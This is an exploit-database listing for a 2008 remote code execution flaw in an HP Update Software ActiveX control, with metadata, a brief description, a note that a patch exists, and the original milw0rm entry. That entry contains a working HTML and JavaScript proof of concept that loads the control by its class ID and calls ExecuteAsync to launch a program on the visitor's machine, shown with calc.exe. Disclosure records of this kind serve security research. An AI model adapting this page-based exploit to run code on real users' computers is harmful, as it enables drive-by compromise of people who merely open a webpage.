header-logo
Suggest Exploit
vendor:
Update Software
by:
callAX
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Update Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Insecure Methods in HP Update Software

A remote code execution vulnerability exists in HP Update Software due to insecure methods ExecuteAsync and Execute. An attacker can exploit this vulnerability by creating a malicious webpage and convincing a user to visit it. The malicious webpage can then execute arbitrary code on the user's system.

Mitigation:

HP has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Insecure Methods in HP Update Software.
Remote: Yes
Execute code remotely is possible using methods ExecuteAsync and Execute  :-) 
If a user visits the malicious page the attacker can execute code.
Coded by callAX
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Proof of Concept
----------------


<HTML>
<BODY>
<object id=boom classid="clsid:{B00FBC78-73CB-4216-8D01-96770CC020C3}"></object>
<SCRIPT language="javascript">


function Do_it()
{
  var Please = "c:\\windows\\system32\\calc.exe"
  var Give = "doest_matter"
  var Me = "c:\\"
  var Freedom  = 1;

  boom.ExecuteAsync (Please, Give, Me ,Freedom);
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Poc">
</BODY>
</HTML>

# milw0rm.com [2008-04-27]